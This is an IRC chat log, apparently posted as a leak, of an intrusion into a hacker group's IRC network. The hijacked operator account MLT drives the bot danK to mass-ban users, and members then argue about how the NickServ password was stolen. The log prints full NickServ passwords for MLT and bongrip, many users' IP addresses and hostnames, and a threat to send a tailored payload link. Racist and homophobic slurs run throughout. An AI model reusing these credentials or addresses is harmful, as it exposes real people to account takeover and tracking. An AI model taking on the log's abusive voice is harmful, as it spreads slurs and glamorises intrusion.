█ ProjectInsecurity (no reason))
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ n0rdi!ric0@23.239.80.28 (User has been permanently banned from
|
|
█ internetz.me (no reason))
|
|
█ <danK> (User) connecting : at fsociety.internetz.me: synk
|
|
█ (loeken@eu.fr1.cdn.internetz.me)
|
|
█ <MLT> .gline rek
|
|
█ <danK> Added gline for rek r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ rek!r_e_k@46.102.152.118 (User has been permanently banned from
|
|
█ internetz.me (no reason))
|
|
█ <MLT> .gline pop
|
|
█ <danK> Added gline for pop r.i.p
|
|
█ <MLT> .gline synk
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ pop!lol@blackhat.cat (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <danK> Added gline for synk r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ synk!loeken@eu.fr1.cdn.internetz.me (User has been permanently banned
|
|
█ from internetz.me (no reason))
|
|
█ <MLT> .gline syn4pse-
|
|
█ <danK> Added gline for syn4pse- r.i.p
|
|
█ <danK> (User) connecting : at aussie.insecurity.zone: NS-DonaldL
|
|
█ (NS-DonaldL@ip-90-2-52-196.nyc.us.northamericancoax.com)
|
|
█ <MLT> .gline smurgle
|
|
█ <danK> Added gline for smurgle r.i.p
|
|
█ <MLT> .gline NS-DonaldL
|
|
█ <danK> Added gline for NS-DonaldL r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ NS-DonaldL!NS-DonaldL@ip-90-2-52-196.nyc.us.northamericancoax.com
|
|
█ (User has been permanently banned from ProjectInsecurity (no reason))
|
|
█ <MLT> .gline rqu1_
|
|
█ <danK> Added gline for rqu1_ r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ rqu1!r@216.218.222.12 (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ rqu1_!r@216.218.222.12 (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <MLT> .gline Zodiac
|
|
█ <danK> (User) connecting : at aussie.insecurity.zone: rqu1
|
|
█ (r@163.172.212.115)
|
|
█ <danK> Added gline for Zodiac r.i.p
|
|
█ <danK> (User) connecting : at aussie.insecurity.zone: rqu1_
|
|
█ (r@163.172.212.115)
|
|
█ <MLT> .gline rqu1_
|
|
█ <danK> Added gline for rqu1_ r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ rqu1!r@163.172.212.115 (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ rqu1_!r@163.172.212.115 (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <MLT> .gline Southern_B|tch
|
|
█ <danK> Added gline for Southern_B|tch r.i.p
|
|
█ <MLT> .gline BrownDowntown
|
|
█ <danK> Added gline for BrownDowntown r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ BrownDowntown!bdt@212.92.104.143 (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <MLT> .gline Conflict
|
|
█ <danK> Added gline for Conflict r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ Conflict!Conflict@185.10.68.229 (User has been permanently banned from
|
|
█ internetz.me (no reason))
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ hipphopp!n@185.10.68.229 (User has been permanently banned from
|
|
█ internetz.me (no reason))
|
|
█ <MLT> .gline sipa
|
|
█ <danK> Added gline for sipa r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ sipa!sipa@dsl-trebng11-54f90b-135.dhcp.inet.fi (User has been
|
|
█ permanently banned from internetz.me (no reason))
|
|
█ <MLT> .gline thom
|
|
█ <danK> Added gline for thom r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me: thom!xD@haxx.pw (User
|
|
█ has been permanently banned from internetz.me (no reason))
|
|
█ <danK> (User) exiting : at fsociety.internetz.me: lilwiz!lilwiz@haxx.pw
|
|
█ (User has been permanently banned from internetz.me (no reason))
|
|
█ <MLT> .gline krazed
|
|
█ <danK> Added gline for krazed r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ krazed!admin@bigballs.club (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <MLT> .gline lola
|
|
█ <danK> Added gline for lola r.i.p
|
|
█ <MLT> .gline ald0g
|
|
█ <danK> Added gline for ald0g r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ ald0g!root@prawksi.relay.coldhak.com (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <MLT> .gline installgen2
|
|
█ <danK> Added gline for installgen2 r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ installgen2!installgen@gen2.space (User has been permanently banned from
|
|
█ internetz.me (no reason))
|
|
█ <MLT> .gline pezzer
|
|
█ <danK> Added gline for pezzer r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ pezzer!pezzer@144.202.228.211 (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <danK> (User) connecting : at aussie.insecurity.zone: ald0g
|
|
█ (root@185.170.41.8)
|
|
█ <MLT> .gline ald0g
|
|
█ <danK> Added gline for ald0g r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone: ald0g!root@185.170.41.8
|
|
█ (User has been permanently banned from ProjectInsecurity (no reason))
|
|
█ <MLT> .gline gibbz
|
|
█ <danK> Added gline for gibbz r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ gibbz!gibby@69.150.188.35.bc.googleusercontent.com (User has been
|
|
█ permanently banned from internetz.me (no reason))
|
|
█ <MLT> .gline Glaive
|
|
█ <danK> (User) connecting : at fsociety.internetz.me: loeken
|
|
█ (loeken@eu.fr2.cdn.internetz.me)
|
|
█ <danK> Added gline for Glaive r.i.p
|
|
█ <MLT> .gline loeken
|
|
█ <danK> Added gline for loeken r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ loeken!loeken@eu.fr2.cdn.internetz.me (User has been permanently banned
|
|
█ from internetz.me (no reason))
|
|
█ <MLT> .gline sxcurity
|
|
█ <danK> Added gline for sxcurity r.i.p
|
|
█ <MLT> .gline Jaq
|
|
█ <danK> Added gline for Jaq r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ Jaq!No@pD952AAED.dip0.t-ipconnect.de (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <MLT> .gline tables
|
|
█ <danK> Added gline for tables r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ tables!tables@marylou.nos-oignons.net (User has been permanently banned
|
|
█ from ProjectInsecurity (no reason))
|
|
█ <MLT> .gline c12
|
|
█ <danK> Added gline for c12 r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ c12!c12@politkovskaja.torservers.net (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <MLT> .gline herpez
|
|
█ <danK> Added gline for herpez r.i.p
|
|
█ <danK> (User) connecting : at aussie.insecurity.zone: notroot
|
|
█ (toor@45.63.16.220)
|
|
█ <danK> (User) connecting : at aussie.insecurity.zone: c12
|
|
█ (c12@91.223.82.156)
|
|
█ <MLT> .gline Withers
|
|
█ <danK> Added gline for Withers r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ Withers!YUL@46.101.54.55 (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <MLT> .gline c12
|
|
█ <danK> Added gline for c12 r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone: c12!c12@91.223.82.156
|
|
█ (User has been permanently banned from ProjectInsecurity (no reason))
|
|
█ <MLT> .gline integrity
|
|
█ <danK> Added gline for integrity r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ integrity!hello@gay-nigger-hitler.club (User has been permanently banned
|
|
█ from ProjectInsecurity (no reason))
|
|
█ <danK> (User) connecting : at aussie.insecurity.zone: ma0u
|
|
█ (umom@69.42.217.130)
|
|
█ <MLT> .gline ma0u
|
|
█ <danK> Added gline for ma0u r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone: ma0u!umom@69.42.217.130
|
|
█ (User has been permanently banned from ProjectInsecurity (no reason))
|
|
█ <danK> (User) connecting : at aussie.insecurity.zone: tables
|
|
█ (tables@93.174.93.133)
|
|
█ <danK> NickServ: tables!tables@93.174.93.133 identified for nick tables.
|
|
█ <MLT> .gline tables
|
|
█ <danK> Added gline for tables r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ tables!tables@93.174.93.133 (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <MLT> .join #priv9
|
|
█ <danK> Joining #priv9.
|
|
█ <danK> OPER OVERRIDE: danK
|
|
█ (POTENT@ec2-34-210-28-112.us-west-2.compute.amazonaws.com) MODE #priv9
|
|
█ +ao MLT MLT
|
|
█ <MLT> ;)
|
|
█ * danK has quit (aussie.insecurity.zone superb.undernix.net)
|
|
█ * bongrip has quit (aussie.insecurity.zone superb.undernix.net)
|
|
█ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
|
|
█ * You are now known as NickServ
|
|
█ <MLT> identify ISFATGtrajgvLix4b3hzNzdoMjU1MWB7X2p4!!@Lkkj8/.,xoxs77h2551`{_
|
|
█ jx
|
|
█ <NickServ> ->MLT<- Password accepted, you are now recognized.
|
|
█ <bongrip-> IDENTIFY fuckyehbr0
|
|
█ <NickServ> ->bongrip-<- Password accepted, you are now recognized.
|
|
█ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
|
|
█ хихихи
|
|
█
|
|
█ <MLT> how is it even happening tho?? lol
|
|
█ <MLT> like this all began with defilers bot
|
|
█ <MLT> i understand how that happened
|
|
█ <MLT> the first time
|
|
█ <MLT> but
|
|
█ <MLT> i changed my pass
|
|
█ <MLT> for nickserv
|
|
█ <MLT> did 'MLT' ask you or defiler for a new oper pass in the past few days?
|
|
█ <syn4pse> ffs just use a fuckin bnc
|
|
█ <syn4pse> and be done with it
|
|
█ <MLT> yeah but how the fuck do they have my ns pass
|
|
█ <syn4pse> and get of that faggot webthing
|
|
█ <MLT> lol are none of the boxes pwned
|
|
█ <MLT> I'm pretty sure one of the boxes must be pwned
|
|
█ <NickServ> Just going to drop this here..
|
|
█ <NickServ> <MLT> identify MLT ISFATGtrajgvLix4b3hzNzdoMjU1MWB7X2p4!!@Lkkj8/.
|
|
█ ,xoxs77h2551`{_jx
|
|
█ <NickServ> ->MLT<- Password accepted, you are now recognized.
|
|
█ <MLT> and its not lola's he wioped everything
|
|
█ <MLT> rofl yep
|
|
█ -!- NickServ [NickServ@privacy.internetz.me-F6EB07AA.east.us.northamericanco
|
|
█ ax.com] has quit [User has been permanently banned from internetz.me (...)]
|
|
█ <MLT> wow
|
|
█ <Jaq4l> WTF
|
|
█ <MLT> so um
|
|
█ <MLT> yours or defilers box == pwned
|
|
█ <MLT> I'm guessing
|
|
█ <MLT> lola did a full wipe on all of his shit
|
|
█ <MLT> and i don't even know if its re-linked
|
|
█ <Jaq4l> Can someone pls pm me their jid? So i dont have to bother if things
|
|
█ get even worse
|
|
█ <MLT> if anyone comes on here as me just tell them to post on @insecurity
|
|
█ <MLT> but clearly one of the boxes is pwned, lol
|
|
█ <RMS> post on it now
|
|
█ <syn4pse> just get a bnc
|
|
█ <syn4pse> keep the bnc online
|
|
█ <MLT> ok sec
|
|
█ <syn4pse> and dont use that fuckin webchat
|
|
█ <MLT> doesn't matter
|
|
█ <MLT> if they have all ns passes..
|
|
█ <FuZi0N> waiting for your tweet :P
|
|
█ <MLT> if one of ur boxes is pwned then what difference does that make
|
|
█ <MLT> tweeted
|
|
█ <FuZi0N> tweet "FuZi0N is gawd"
|
|
█ <MLT> i just tweeted 'h'
|
|
█ <Jaq4l> I'll most likely change it
|
|
█ <FuZi0N> https://twitter.com/insecurity?lang=en
|
|
█ <FuZi0N> ahh
|
|
█ <FuZi0N> yes
|
|
█ <RMS> lang=en
|
|
█ <MLT> someone has one of the boxes hooked and i don't think it can be lola's
|
|
█ (he wiped everything because defiler asked me to)
|
|
█ <RMS> doxed bro
|
|
█ <FuZi0N> ooo sheiiit
|
|
█ <RMS> hmm
|
|
█ <RMS> .a
|
|
█ <RMS> mgay
|
|
█ -!- like_our_danK_0day [NickServ@privacy.internetz.me-E8E7395.fr.amsterdamre
|
|
█ sidential.com] has joined #insecurity
|
|
█ <Jaq4l> So this happens if you stuff all hackers into one irc
|
|
█ <like_our_danK_0day> i need assistance, how do i get a CVE?
|
|
█ <Jaq4l> Look at exploit-db
|
|
█ -!- like_our_danK_0day [NickServ@privacy.internetz.me-E8E7395.fr.amsterdamre
|
|
█ sidential.com] has quit [Killed (MLT (kys obese antifa furry retard lmfao))]
|
|
█ <MLT> yeah syn4pse-
|
|
█ <MLT> services are owned
|
|
█ <MLT> it would seem..
|
|
█ -!- ChanServ [services@undernix.net] has joined #insecurity
|
|
█ -!- mode/#insecurity [+ao ChanServ ChanServ] by ChanServ
|
|
█ -!- mode/#insecurity [+rQ] by ChanServ
|
|
█ -!- ChanServ changed the topic of #insecurity to: .ProjectInsecurity || Gene
|
|
█ ral tech-talk (keep it clean in here) || https://insecurity.zone/ || To enqu
|
|
█ ire about joining our core team, then /query MLT || Join #barstool for chats
|
|
█ on fleek.
|
|
█ <MLT> so my use of client wont rly make much of a difference if they got all
|
|
█ ur ns passes anyway lol
|
|
█ <Jaq4l> Can we unsafe login now?
|
|
█ <bongrip-> MLT
|
|
█ <bongrip-> u got rekt
|
|
█ <bongrip-> m8
|
|
█ <bongrip-> ur pw to ur login
|
|
█ <&FuZi0N> this is the insecurity zone guys
|
|
█ <Jaq4l> At least he has choosen a safe password
|
|
█ <syn4pse> password1 ?
|
|
█ <RMS> its not robbie
|
|
█ <MLT> bongrip-: my pw was 60+ chars
|
|
█ <bongrip-> (22:53:36) &MLT: .gline tables
|
|
█ <bongrip-> (22:53:36) danK: Added gline for tables r.i.p
|
|
█ <bongrip-> (22:53:36) danK: (User) exiting : at aussie.insecurity.zone: tabl
|
|
█ es!tables@ (User has been permanently banned from ProjectInsecurity (no reas
|
|
█ on))
|
|
█ <bongrip-> (22:55:23) &MLT: .sajoin
|
|
█ <bongrip-> (22:55:25) &MLT: .join
|
|
█ <bongrip-> (22:55:25) danK: Improper syntax. [Ex: !j <#chan>]
|
|
█ <bongrip-> (22:55:30) &MLT: .join #priv9
|
|
█ <bongrip-> (22:55:30) danK: Joining #priv9.
|
|
█ <bongrip-> (22:55:33) danK: OPER OVERRIDE: danK (POTENT@) MODE #priv9 +ao ML
|
|
█ T MLT
|
|
█ <bongrip-> (22:55:42) &MLT: ;)
|
|
█ <MLT> and used symbols etc
|
|
█ <bongrip-> ya
|
|
█ <bongrip-> someone got ur
|
|
█ <bongrip-> pw
|
|
█ <MLT> then
|
|
█ <bongrip-> nothing is hacked
|
|
█ <MLT> services == owned
|
|
█ <bongrip-> no
|
|
█ <bongrip-> services arent owned
|
|
█ <MLT> so they just
|
|
█ <bongrip-> they authed under you
|
|
█ <MLT> magicked a 60+ char pw that ive never used for anything else
|
|
█ <syn4pse> just you lel
|
|
█ <bongrip-> they opered on you
|
|
█ <MLT> outta nowhere?
|
|
█ <bongrip-> they cracked hash bro
|
|
█ <bongrip-> the md5
|
|
█ <bongrip-> idk whats going on man
|
|
█ <bongrip-> idk how they got u
|
|
█ <MLT> so how'd they get the d5
|
|
█ <bongrip-> but they got u
|
|
█ <MLT> md5**
|
|
█ <MLT> to begin with <- Wait. I thought you didn't use MD5?
|
|
█ <bongrip-> i dont think they ever got it tbh cause noboxes are compromised
|
|
█ <bongrip-> on my end
|
|
█ <bongrip-> they simply identified as you
|
|
█ <bongrip-> and glined with dank
|
|
█ <bongrip-> ok so they didnt get oper
|
|
█ <bongrip-> they didnt oper up
|
|
█ <MLT> i changed that pass
|
|
█ <MLT> today
|
|
█ <MLT> i set that pw today
|
|
█ <bongrip-> yea well
|
|
█ <MLT> and somehow they have the new one
|
|
█ <bongrip-> someone got ur ident pass
|
|
█ <MLT> that's 60+ chars
|
|
█ <bongrip-> cause u /msg'd nickserv
|
|
█ <MLT> how does that work lol
|
|
█ <bongrip-> on day
|
|
█ <bongrip-> one day
|
|
█ <syn4pse> time to reinstall winblows :p
|
|
█ <syn4pse> lmao
|
|
█ <Jaq4l> Lol
|
|
█ <syn4pse> did you click on any fancy links lately :p
|
|
█ <bongrip-> musta been when services were gone
|
|
█ <bongrip-> someone /nicked nickserv
|
|
█ <bongrip-> got ur pass
|
|
█ <MLT> ya probably, i am running windows lmao
|
|
█ <Jaq4l> He msgd an user
|
|
█ <bongrip-> u may never have changed it
|
|
█ <bongrip-> but
|
|
█ <bongrip-> someone definitely got ur pw
|
|
█ <MLT> i changed it todaya
|
|
█ <MLT> this morning
|
|
█ <&FuZi0N> FYI never do /msg nickserv use /nickserv instead
|
|
█ <MLT> because someone was on my acc yesterday
|
|
█ <MLT> then they got my new pass
|
|
█ <bongrip-> ya i use //ns
|
|
█ <bongrip-> i use the alias
|
|
█ <bongrip-> given
|
|
█ <MLT> ya i should have did //ns lol
|
|
█ <MLT> rookie mistake
|
|
█ <MLT> tbh
|
|
█ <Jaq4l> Lol
|
|
█ <&FuZi0N> MLT ain't no rookie
|
|
█ <&FuZi0N> he's a phenom
|
|
█ <Jaq4l> Lol
|
|
█ <bongrip-> hrm
|
|
█ <bongrip-> fucking
|
|
█ <bongrip-> syn4pse- deleted my oper lol
|
|
█ <bongrip-> cause dank was on it
|
|
█ <bongrip-> and someone was going ham on ur account
|
|
█ <&FuZi0N> yeah
|
|
█ <syn4pse> through your bot
|
|
█ <bongrip-> yea but
|
|
█ <&FuZi0N> seperate dank and your olines
|
|
█ <bongrip-> they identified
|
|
█ <bongrip-> to mlt
|
|
█ <syn4pse> congrats
|
|
█ <&FuZi0N> so we can isolate the issue next time
|
|
█ <syn4pse> once again team effort
|
|
█ <syn4pse> lol
|
|
█ <bongrip-> i mean lets look at the beginning entrance
|
|
█ <MLT> are u sure they haven't got another bug in dank??
|
|
█ <bongrip-> nope
|
|
█ <bongrip-> positive
|
|
█ <bongrip-> 100%
|
|
█ <MLT> are u sanitizing everything now? or did u just sanitize UD?
|
|
█ <MLT> ah ok
|
|
█ <bongrip-> i loked at #noc
|
|
█ <bongrip-> they made dank join #priv9
|
|
█ <bongrip-> and glined more ppl
|
|
█ <&FuZi0N> hahah
|
|
█ <Jaq4l> Loooooooo8888888
|
|
█ <bongrip-> !user list
|
|
█ <bongrip-> fuck
|
|
█ <syn4pse> so to sum it up
|
|
█ <&FuZi0N> but when i did .pwn mlt how were they still able to access dank?
|
|
█ <syn4pse> im the only oper who didnt fuck up compltely?
|
|
█ <syn4pse> lmao
|
|
█ * syn4pse feels secure
|
|
█ <RMS> lol
|
|
█ <bongrip-> lol
|
|
█ <MLT> i don't see what i can be doing wrong (other than running windows)
|
|
█ <bongrip-> to be fair the sendraw wasnt shit
|
|
█ <&FuZi0N> dirty and i were the IDS
|
|
█ <bongrip-> but lemme fix this
|
|
█ <MLT> inb4 they hit me w/ some browser 0day
|
|
█ <MLT> lol
|
|
█ <&FuZi0N> then syn4pse- did the hacking
|
|
█ <MLT> because i have no idea
|
|
█ <MLT> how they could repeatedly obtain my ns pass
|
|
█ <MLT> if services weren't pwned
|
|
█ <bongrip-> they didnt have any real access
|
|
█ <MLT> can only mean I'm pwned @ client-side i guess
|
|
█ <syn4pse> MLT, thats why you dont fuckin open unknown links
|
|
█ <syn4pse> theres sandboxes
|
|
█ <MLT> well, i dont
|
|
█ <MLT> do that
|
|
█ <syn4pse> disposable vms
|
|
█ <MLT> so like
|
|
█ <syn4pse> etc for that sorta thing
|
|
█ <MLT> idk how this could have happened
|
|
█ <bongrip-> i htink they snagged ur pw
|
|
█ <bongrip-> the last time that shit happened
|
|
█ <&FuZi0N> bongrip: .pwn cmd deletes access from dank right?
|
|
█ <bongrip-> these are the same people
|
|
█ <bongrip-> taht did it last time
|
|
█ <bongrip-> MLT
|
|
█ <bongrip-> theres no other way
|
|
█ <bongrip-> they got ur pw
|
|
█ <bongrip-> unless u truly are owned
|
|
█ <MLT> were u talking to 'MLT' on here in the past few days?
|
|
█ <bongrip-> which i highly doubt
|
|
█ <MLT> because its been them
|
|
█ <MLT> the entire time
|
|
█ <bongrip-> this is a classic case of SE
|
|
█ <bongrip-> and good organization
|
|
█ <bongrip-> and planning
|
|
█ <MLT> i haven't been on since Wednesday or thursday
|
|
█ <bongrip-> too bad theres no real skills behind them
|
|
█ <&FuZi0N> bongrip: but when i did .pwn mlt how were they still able to acces
|
|
█ s dank?
|
|
█ <bongrip-> they could do real damage
|
|
█ <syn4pse> this is a classic case of double face palm time
|
|
█ <bongrip-> they werent
|
|
█ <bongrip-> it was already done
|
|
█ <bongrip-> and u probably didnt have access
|
|
█ <bongrip-> if htey know how to use the box
|
|
█ <bongrip-> bot*
|
|
█ <MLT> yea tbh this is the first time anything of mine has ever been 'owned'
|
|
█ lol
|
|
█ <bongrip-> they probably deleted my entire !user list
|
|
█ <bongrip-> and !nig list
|
|
█ <bongrip-> fuzi0n u probably dont even have access anymore
|
|
█ <syn4pse> time 2 retire dank :)
|
|
█ <bongrip-> i have to check and see what all theyve done
|
|
█ <bongrip-> nah
|
|
█ <bongrip-> dank is good
|
|
█ <bongrip-> its time for u nigs to
|
|
█ <&FuZi0N> well i did the pwn cmd and the bot was banned but they just rejoin
|
|
█ ed and started glining....
|
|
█ <bongrip-> secure ur pw's
|
|
█ <syn4pse> then run it without an oline
|
|
█ <MLT> I still don't understand how they could obtain my nickserv pass
|
|
█ <MLT> after i changed it this morning
|
|
█ <bongrip-> ya ill run it w/out an oline
|
|
█ <bongrip-> doesnt need one
|
|
█ <bongrip-> thatll end everything
|
|
█ <&FuZi0N> i think the box is popped
|
|
█ <bongrip-> no more anything
|
|
█ <bongrip-> no its not
|
|
█ <bongrip-> lol
|
|
█ <bongrip-> lur an idoit
|
|
█ <bongrip-> no box is popped
|
|
█ <&FuZi0N> but then explain
|
|
█ <bongrip-> listen ill break it down to u
|
|
█ <bongrip-> listen
|
|
█ <bongrip-> listen
|
|
█ <bongrip-> slitsen
|
|
█ <bongrip-> ok
|
|
█ <bongrip-> these are the same guys
|
|
█ <syn4pse> rofl
|
|
█ <syn4pse> HERE IT COMES
|
|
█ <bongrip-> that did the .priv9 shit
|
|
█ <bongrip-> from urban dictionary
|
|
█ <bongrip-> sthe sendraw
|
|
█ <bongrip-> they still had mlt's password
|
|
█ <MLT> oh yea its definitely him
|
|
█ <MLT> lol
|
|
█ <bongrip-> fromn when all that shit happened
|
|
█ <bongrip-> they held onto it
|
|
█ <bongrip-> to do this again
|
|
█ <bongrip-> today
|
|
█ <bongrip-> they held it that long...
|
|
█ <bongrip-> when they couldh ave owned
|
|
█ <MLT> they've been on here for days
|
|
█ <bongrip-> shit
|
|
█ <MLT> were u speaking to 'MLT' past 3 days//
|
|
█ <bongrip-> yea but nmothing was leaked
|
|
█ <bongrip-> no
|
|
█ <bongrip-> i wasnt
|
|
█ <bongrip-> trust nothing was leaked
|
|
█ <MLT> ah
|
|
█ <bongrip-> im telling u
|
|
█ <bongrip-> they had ur password
|
|
█ <bongrip-> from last time
|
|
█ <bongrip-> shit happened
|
|
█ <&FuZi0N> does mlt have oper or only oper via dank?
|
|
█ <bongrip-> he has oper
|
|
█ <bongrip-> so they would have used oper
|
|
█ <&FuZi0N> ahh ok
|
|
█ <bongrip-> to own us
|
|
█ <bongrip-> instead of dank
|
|
█ <MLT> i have oper but not via dank
|
|
█ <bongrip-> if htey knew what they were doing
|
|
█ <MLT> and they don't have my oper pass
|
|
█ <bongrip-> ya
|
|
█ <bongrip-> just his nickserv pw
|
|
█ <bongrip-> they saved from the last skidmarks they put on the server
|
|
█ <MLT> yeah but
|
|
█ <MLT> i changed my ns pass
|
|
█ <MLT> today
|
|
█ <MLT> then this happens later today
|
|
█ <&FuZi0N> Selling nickserv passwords for btc. PM bongrip for prices!
|
|
█ <&FuZi0N> we can have another revenue stream guys
|
|
█ <bongrip-> what were u using
|
|
█ <bongrip-> what client mlt
|
|
█ <bongrip-> hoping not irccloud
|
|
█ <bongrip-> that shit is owned
|
|
█ <bongrip-> most webirc's are
|
|
█ <MLT> lol, have been using irccloud
|
|
█ <MLT> ill start using irssi again
|
|
█ <bongrip-> you havent heard about irccloud?
|
|
█ <MLT> um not other than some lame IP leak method
|
|
█ <bongrip-> digerati got his ass raped
|
|
█ <bongrip-> i fucked with a lot of people too for years
|
|
█ <bongrip-> until they publicly started showing that irccloud was owned
|
|
█ <bongrip-> like nubs
|
|
█ <bongrip-> ruined fun for everyone
|
|
█ <bongrip-> tbh
|
|
█ <&bongrip> MLT
|
|
█ <&bongrip> oh theres more than just ip leak
|
|
█ <&bongrip> but anywho
|
|
█ <&bongrip> thats just the low hanging fruit
|
|
█ <&bongrip> no irccloud
|
|
█ <&bongrip> the leeter people actually have real access
|
|
█ <&bongrip> but dont say shit about it
|
|
█ <Jaq4l> Bongrip, do you have jabber?
|
|
█ <MLT> um
|
|
█ <MLT> I'm trying to change my ns pass
|
|
█ <MLT> then after i do //ns set it tells me to re-identify
|
|
█ <MLT> and its not working w/ the pass i just changed it to
|
|
█ <MLT> lol
|
|
█ -!- mode/#insecurity [-r] by ChanServ
|
|
█ <&bongrip> re-register
|
|
█ <&bongrip> ur account was fucked with
|
|
█ <&bongrip> they logged in so
|
|
█ <&bongrip> chances are they fucked with settings
|
|
█ <&bongrip> :\
|
|
█ <&bongrip> id still wanna know their method of obtaining the pw
|
|
█ <&bongrip> it had to have been nickserv but like
|
|
█ <&bongrip> u said u changed it
|
|
█ <MLT> yeah i changed it early today
|
|
█ <MLT> like 12 hours ago
|
|
█ <MLT> then they had it again by the time i come back online..
|
|
█ <&bongrip> they dont have any other passwords
|
|
█ <&bongrip> otherwise more damage would have been done
|
|
█ <MLT> so does that mean I'm pwned @ client-side
|
|
█ <MLT> or wut
|
|
█ <MLT> lol
|
|
█ <&bongrip> nah ill wait till the real mlt comes on
|
|
█ <&bongrip> oh wait nvm
|
|
█ <&bongrip> rofl
|
|
█ <&bongrip> cause opered
|
|
█ <&bongrip> unless
|
|
█ <&bongrip> theres a leak on that end of the server owners hand
|
|
█ <MLT> nah lol they don't have oper
|
|
█ <MLT> only me got oper
|
|
█ <MLT> i just dunno how they could repeatedly get a nickserv pass like that
|
|
█ <MLT> w/o anope 0day or smth
|
|
█ <&bongrip> nah
|
|
█ <syn4pse> keylogger :)
|
|
█ <&bongrip> im tellin u
|
|
█ <&bongrip> theres something on ur end
|
|
█ <&bongrip> lol
|
|
█ <&bongrip> especially if u changed pw's
|
|
█ <&bongrip> my box is not compromised
|
|
█ <&bongrip> i just checked it out
|
|
█ <&bongrip> i know syn4pse's is secure' we're good
|
|
█ <&bongrip> idk man
|
|
█ <&bongrip> the main point is
|
|
█ <&bongrip> if you have to ask if you're owned
|
|
█ <&bongrip> just assume it to be
|
|
█ <MLT> yeah I'm gonna wipe my os
|
|
█ <MLT> and install Linux tomorrow
|
|
█ <MLT> i can only assume ive been hit w/ something @ client-side
|
|
█ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
|
|
█ 21:09 <~bongrip> MLT
|
|
█ 21:09 <~bongrip> the mammoth has been poked <- Вот дерьмо
|
|
█ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
|
|
█ <+ghost> MLT: did you finish installing Linux?
|
|
█ <~MLT> didnt start yet
|
|
█ <+ghost> ok just let us know the uname -a when you're done so we can tailor
|
|
█ the payload for the next link we send you
|
|
█ <~syn4pse> lol
|
|
█ <~bongrip> ghost
|
|
█ <~bongrip> come at me little pup
|
|
█ <~bongrip> who r u bb
|
|
█ <+ghost> nobody cares about your shitty irc bot
|
|
█ <~bongrip> what type of payload are we talking sweetherat
|
|
█ <~bongrip> yea bro thats a hobby dont limit me to what i say
|
|
█ <~bongrip> please dont doubt shit son
|
|
█ <~bongrip> rofl
|
|
█ <+ghost> why do you think we sent .raw, we could do it if we actually wanted
|
|
█ access
|
|
█ <~bongrip> no
|
|
█ <~bongrip> you couldnt rofl
|
|
█ <+ghost> you have said enough in that respect
|
|
█ <~bongrip> you didnt
|
|
█ <~bongrip> you didnt know what to do
|
|
